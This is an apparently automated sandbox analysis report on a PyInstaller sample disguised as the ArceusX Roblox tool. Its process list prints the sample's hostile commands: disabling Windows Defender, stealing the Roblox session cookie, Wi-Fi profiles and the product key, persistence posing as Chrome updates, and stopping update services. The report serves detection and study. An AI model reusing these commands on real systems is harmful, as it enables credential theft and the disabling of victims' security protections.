Malware Analysis Report

2024-11-13 15:29

Sample ID 240606-svh22agh65
Target Arceus.rar
SHA256 0e05a9da73233d2173300ea096860d4e0320e71ad28bb3450fafa1ee82eefa2d
Tags
pyinstaller evasion execution upx
score
8/10

Analysis Overview

score
8/10

SHA256

0e05a9da73233d2173300ea096860d4e0320e71ad28bb3450fafa1ee82eefa2d

Threat Level: Likely malicious

The file Arceus.rar was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller evasion execution upx

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

UPX packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Launches sc.exe

Detects Pyinstaller

Unsigned PE

Enumerates physical storage devices

Enumerates processes with tasklist

Modifies registry key

Delays execution with timeout.exe

Detects videocard installed

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Gathers system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-06 15:27

Signatures

Detects Pyinstaller

Tags: pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-06 15:26

Reported

2024-06-06 15:29

Platform

win10v2004-20240426-en

Max time kernel

0s

Max time network

37s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\main.pyc

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\main.pyc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-06 15:26

Reported

2024-06-06 15:29

Platform

win10v2004-20240508-en

Max time kernel

2s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ArceusX.exe"

Signatures

Stops running service(s)

Tags: evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI15602\Build.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ArceusX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ArceusX.exe N/A

UPX packed file

Tags: upx

Description Indicator Process Target
54 matches, each with Description, Indicator, Process and Target reported as N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A

Detects Pyinstaller

Tags: pyinstaller

Description Indicator Process Target
5 matches, each with Description, Indicator, Process and Target reported as N/A

Creates scheduled task(s)

Tags: persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Delays execution with timeout.exe

Tags: evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ArceusX.exe

"C:\Users\Admin\AppData\Local\Temp\ArceusX.exe"

C:\Users\Admin\AppData\Local\Temp\ArceusX.exe

"C:\Users\Admin\AppData\Local\Temp\ArceusX.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI15602\Build.exe -pbeznogym

C:\Users\Admin\AppData\Local\Temp\_MEI15602\Build.exe

C:\Users\Admin\AppData\Local\Temp\_MEI15602\Build.exe -pbeznogym

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI41882\s.exe -pbeznogym

C:\Users\Admin\AppData\Local\Temp\_MEI41882\s.exe

C:\Users\Admin\AppData\Local\Temp\_MEI41882\s.exe -pbeznogym

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('An error was encountered during authentication. Please try again.', 0, 'Authentication Failed', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\ProgramData\main.exe

"C:\ProgramData\main.exe"

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\ProgramData\svchost.exe

"C:\ProgramData\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\ProgramData\setup.exe

"C:\ProgramData\setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('An error was encountered during authentication. Please try again.', 0, 'Authentication Failed', 0+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [...]"

C:\ProgramData\svchost.exe

"C:\ProgramData\svchost.exe"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [...]

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kwvmipfo\kwvmipfo.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7659.tmp" "c:\Users\Admin\AppData\Local\Temp\kwvmipfo\CSC6945134814D346A5ADF8DB291BB34457.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47122\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\aWoYa.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI47122\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI47122\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\aWoYa.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8107.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp8107.tmp.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 3860"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

Network

Country  Destination             Domain                         Proto
US       8.8.8.8:53              8.8.8.8.in-addr.arpa           udp
US       8.8.8.8:53              228.249.119.40.in-addr.arpa    udp
US       8.8.8.8:53              172.210.232.199.in-addr.arpa   udp
US       8.8.8.8:53              71.31.126.40.in-addr.arpa      udp
US       8.8.8.8:53              57.169.31.20.in-addr.arpa      udp
US       8.8.8.8:53              gstatic.com                    udp
GB       172.217.16.227:443      gstatic.com                    tcp
US       8.8.8.8:53              227.16.217.172.in-addr.arpa    udp
US       8.8.8.8:53              ip-api.com                     udp
US       208.95.112.1:80         ip-api.com                     tcp
US       8.8.8.8:53              1.112.95.208.in-addr.arpa      udp
US       8.8.8.8:53              raw.githubusercontent.com      udp
US       185.199.108.133:443     raw.githubusercontent.com      tcp
US       8.8.8.8:53              www.google.com                 udp
GB       142.250.187.196:80      www.google.com                 tcp
US       185.199.108.133:443     raw.githubusercontent.com      tcp
US       8.8.8.8:53              133.108.199.185.in-addr.arpa   udp
US       8.8.8.8:53              api.github.com                 udp
GB       20.26.156.210:443       api.github.com                 tcp
US       8.8.8.8:53              api.ipify.org                  udp
US       104.26.12.205:443       api.ipify.org                  tcp
US       8.8.8.8:53              205.12.26.104.in-addr.arpa     udp
US       8.8.8.8:53              210.156.26.20.in-addr.arpa     udp
TW       123.51.141.209:80       -                              tcp
US       69.67.159.4:80          -                              tcp
FR       31.32.119.143:80        -                              tcp
US       7.237.201.16:80         -                              tcp
US       149.122.148.254:80      -                              tcp
US       35.15.107.253:80        -                              tcp
US       131.157.128.149:80      -                              tcp
CN       43.229.40.44:80         -                              tcp
KR       121.131.91.85:80        -                              tcp
US       72.108.13.223:80        -                              tcp
BE       88.221.83.233:443       www.bing.com                   tcp
US       8.8.8.8:53              233.83.221.88.in-addr.arpa     udp
KR       183.98.141.147:80       -                              tcp
CN       58.192.42.40:80         -                              tcp
CN       101.38.33.61:80         -                              tcp
GB       89.243.255.71:80        -                              tcp
GB       86.14.74.2:80           -                              tcp
VN       113.190.126.214:80      -                              tcp
DE       178.24.193.25:80        -                              tcp
SA       100.254.118.151:80      -                              tcp
US       166.220.35.86:80        -                              tcp
CN       113.91.228.153:80       -                              tcp
US       51.8.239.32:80          -                              tcp
CN       103.49.110.251:80       -                              tcp
FR       92.90.131.78:80         -                              tcp
NP       111.119.47.182:80       -                              tcp
CO       181.248.74.4:80         -                              tcp
TW       219.91.98.218:80        -                              tcp
CA       142.137.15.252:80       -                              tcp
US       22.187.114.14:80        -                              tcp
RO       92.83.47.185:80         -                              tcp
BE       81.241.135.169:80       -                              tcp
US       208.95.112.1:80         ip-api.com                     tcp
US       8.8.8.8:53              discord.com                    udp
US       162.159.137.232:443     discord.com                    tcp
US       208.95.112.1:80         ip-api.com                     tcp
US       161.151.243.109:80      -                              tcp
JP       163.218.172.251:80      -                              tcp
DE       46.101.118.5:80         -                              tcp
JP       123.223.193.61:80       -                              tcp
KR       118.34.174.84:80        -                              tcp
PL       31.175.157.193:80       -                              tcp
FR       90.48.49.50:80          -                              tcp
US       33.189.222.210:80       -                              tcp
JP       35.74.7.48:80           -                              tcp
US       185.199.108.133:443     raw.githubusercontent.com      tcp
CN       115.208.163.146:80      -                              tcp

Domain is shown as - where the sandbox recorded no hostname for the connection.

Files

C:\Users\Admin\AppData\Local\Temp\_MEI15602\python310.dll

MD5 3f782cf7874b03c1d20ed90d370f4329
SHA1 08a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA256 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

memory/3484-16-0x00007FF917B20000-0x00007FF917F86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI15602\VCRUNTIME140.dll

MD5 f34eb034aa4a9735218686590cba2e8b
SHA1 2bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA256 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512 d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

C:\Users\Admin\AppData\Local\Temp\_MEI15602\_socket.pyd

MD5 0dd957099cf15d172d0a343886fb7c66
SHA1 950f7f15c6accffac699c5db6ce475365821b92a
SHA256 8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a
SHA512 3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee

C:\Users\Admin\AppData\Local\Temp\_MEI15602\_lzma.pyd

MD5 7c66f33a67fbb4d99041f085ef3c6428
SHA1 e1384891df177b45b889459c503985b113e754a3
SHA256 32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866
SHA512 d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d

C:\Users\Admin\AppData\Local\Temp\_MEI15602\_hashlib.pyd

MD5 13f99120a244ab62af1684fbbc5d5a7e
SHA1 5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724
SHA256 11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b
SHA512 46c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d

C:\Users\Admin\AppData\Local\Temp\_MEI15602\_decimal.pyd

MD5 2030438e4f397a7d4241a701a3ca2419
SHA1 28b8d06135cd1f784ccabda39432cc83ba22daf7
SHA256 07d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72
SHA512 767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad

C:\Users\Admin\AppData\Local\Temp\_MEI15602\_bz2.pyd

MD5 f6e387f20808828796e876682a328e98
SHA1 6679ae43b0634ac706218996bac961bef4138a02
SHA256 8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b
SHA512 ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e

C:\Users\Admin\AppData\Local\Temp\_MEI15602\unicodedata.pyd

MD5 dfa1f0cd0ad295b31cb9dda2803bbd8c
SHA1 cc68460feae2ff4e9d85a72be58c8011cb318bc2
SHA256 46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10
SHA512 7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e

C:\Users\Admin\AppData\Local\Temp\_MEI15602\select.pyd

MD5 5c66bcf3cc3c364ecac7cf40ad28d8f0
SHA1 faf0848c231bf120dc9f749f726c807874d9d612
SHA256 26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc
SHA512 034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6

C:\Users\Admin\AppData\Local\Temp\_MEI15602\libcrypto-1_1.dll

MD5 e5aecaf59c67d6dd7c7979dfb49ed3b0
SHA1 b0a292065e1b3875f015277b90d183b875451450
SHA256 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1
SHA512 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

C:\Users\Admin\AppData\Local\Temp\_MEI15602\Build.exe

MD5 4b71b5757d7a8c1686a1093c535d50f7
SHA1 6c3fb42cd4c6a7f440669def0ca7d2bcee4dca0c
SHA256 741a09211946b40c1f7e7e625ac290fb8b8d12f804c82d46cbb294cf56774de9
SHA512 bf245c3be883d6d75ff1ec5ff43c4f39d00ce0704060f252923e607106712df6174ed0537929e4f7ecabfa18a3de11411cda695756c75f40262b56e5467c1595

C:\Users\Admin\AppData\Local\Temp\_MEI15602\base_library.zip

MD5 483d9675ef53a13327e7dfc7d09f23fe
SHA1 2378f1db6292cd8dc4ad95763a42ad49aeb11337
SHA256 70c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e
SHA512 f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5

C:\Users\Admin\AppData\Local\Temp\_MEI15602\Build.exe

MD5 d09a96588b447fe067462f11f878360f
SHA1 108694088b73fc86ef29de72592ad3407235f89a
SHA256 27f7421e904dc47c1c667b3f9ee34d7fe8542eeeaba4f8afa3d68c514d923bb2
SHA512 afc3b92624e5897fcf1dfdb920fd283b1d16e9bf6e5abe29b3190120af2acf3e2e94f8419646d840b774ad33f5a6d096beec5a96ecabe7f7d7a619de248191da

memory/3484-29-0x00007FF917B20000-0x00007FF917F86000-memory.dmp

C:\ProgramData\Microsoft\hacn.exe

MD5 501b5527ab4c5e9afcb35127418f74df
SHA1 5751ead1d4880e0c784a09813c466adbffde67b1
SHA256 e4b3ea1b9449eac690fcd432b48e06793b66e76c57680c5978d74006b6f07cf7
SHA512 f27fe9cef5f7f18fb318074ba999e55ca235b16ab81c9e3f46541fab368e051a63664fadb070831859803e8748f5863ee6e4ea50fb7c0b3f92c51bb704ed3543

C:\ProgramData\Microsoft\hacn.exe

MD5 c8318784b5788a4d7b150dd9d0506ebd
SHA1 dd0c7aa75e7ff2d9203e13528d9d762b2762efa7
SHA256 8d39745736082458c4d4b48148c7ccd6aba8453a766bb5f831cda258396a237e
SHA512 ed43b8c6c00bb0f997906d765017b4115403e18bdd9ae08fa777097cb008685af0d31b0fa215b8e19e1c8aa4b31bee5199601635b8cf3041ca8b92a6197ce6ae

C:\ProgramData\Microsoft\hacn.exe

MD5 7670ac542327801e8fa1fe55d21c4e78
SHA1 e97a4275ff46c2ea7954b0331f3ee40091025fd4
SHA256 69009376a61d005a55dd404ecd7a18313d6b970fb08124f59599529292a6c0a3
SHA512 c1429b5d91e60ababe2aec8b7369ea213029658262a9487c1d11d81fef5f92c9c7e7f7ba749e2497cb25822b97b8947600c9171d8d10623f67c933f33bd568ab

C:\ProgramData\Microsoft\based.exe

MD5 93d41070d2be9a85d08f1439c740f9ff
SHA1 c2601d68dd97191037a7fcb84398a88f100af102
SHA256 b889de08a4b9e293a0480623facdbddf97d6797f3d6473a740f0a62e2d716116
SHA512 e8a0f47248b52a0de45d7addf1ce8ebbdce5ce13ade1b6ed4e4817bb91224aa92b858a83bea1f76336c6fd52c97711234cb43164d0035d0d4a75c0da2a2af293

memory/4256-87-0x00007FF916740000-0x00007FF916BA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI41882\python310.dll

MD5 a5c7a5925ef0e2fc473b970b0ef92e9b
SHA1 de674aecbc3fa337b559efeb1bb7df4684f291f1
SHA256 087bc88cc185d0f3b8bfb4812d13255709b97717bf31b17fb730e1232c5f80a6
SHA512 06ec79a686d04073a6e61ad9cc1d3a95d299ed24e59dd25fea001bf0e3f153f8797e79b7032d703fb6a3efa1b2e5d3b3f6cb1f8db2acd06d06751524ff563e62

C:\ProgramData\Microsoft\hacn.exe

MD5 01eb9cd0c1b1862ea87174a62201a397
SHA1 f44c6f359161bb66e772fa75698cf7abd3b9519d
SHA256 14365b3661f36183bffced0efc0628e07059b40c05b5eb4ca47bb5d9bd5d92f5
SHA512 50cc07aff45a8e5809d5c1b7725832eebb0bfd05144ae92bc565c8481834a13c8dff10d8d1adf6b4d51df026066a36e09e040e766c78fb1d754690240a9d91c1

C:\Users\Admin\AppData\Local\Temp\_MEI47122\_ctypes.pyd

MD5 48ce90022e97f72114a95630ba43b8fb
SHA1 f2eba0434ec204d8c6ca4f01af33ef34f09b52fd
SHA256 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635
